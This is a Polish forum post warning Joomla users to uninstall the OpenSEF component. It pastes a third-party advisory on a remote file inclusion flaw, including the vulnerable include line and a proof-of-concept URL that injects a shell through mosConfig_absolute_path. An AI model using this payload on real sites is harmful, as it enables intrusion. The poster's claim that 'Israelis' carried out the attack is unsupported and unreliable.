Komponent OpenSef Proponuje odinstalować !

Zostalem ofiara wykorzystania luki bezpieczenstwa w komponencie OpenSef

Proponuje ODINSTALOWAC KOMPONENT !
do czasu opracowania łatki.

luki maja wersje:
OpenSEF Project OpenSEF 2.0-beta3
OpenSEF Project OpenSEF 2.0 RC5 SP2
OpenSEF Project OpenSEF 2.0 RC5 SP1
OpenSEF Project OpenSEF 2.0 RC5
OpenSEF Project OpenSEF 2.0 RC4
OpenSEF Project OpenSEF 2.0 RC3
OpenSEF Project OpenSEF 2.0 RC2
OpenSEF Project OpenSEF 2.0 RC1

A Oto jak tego dokonali izraelczycy:

Joomla OpenSEF Component mosConfig_absolute_path Remote File Include Vulnerability
#####################
Aria-Security.net Advisory
Discovered by: O.U.T.L.A.W # # < www.Aria-security.net >
Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp
###################

#Software: OpenSEF

#Attack method: Remote File Inclusion

#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)

#Source:

require_once( $mosConfig_absolute_path . '/includes/sef.php' );

} else {

// Joomla!'s SEF option is turned off; revert to Joomla!'s original-style

#Proof of Concept:

#http://www.site.com/sef.php?mosConfi...ute_path=SHELL

#

#----------------------------------------------------------

#

#

OpenSEF Project OpenSEF 2.0-beta3
OpenSEF Project OpenSEF 2.0 RC5 SP2
OpenSEF Project OpenSEF 2.0 RC5 SP1
OpenSEF Project OpenSEF 2.0 RC5
OpenSEF Project OpenSEF 2.0 RC4
OpenSEF Project OpenSEF 2.0 RC3
OpenSEF Project OpenSEF 2.0 RC2
OpenSEF Project OpenSEF 2.0 RC1

Temat: Komponent OpenSef Proponuje odinstalować !

Przybornik

Widok

Widok drzewa

Komponent OpenSef Proponuje odinstalować !

Reguły pisania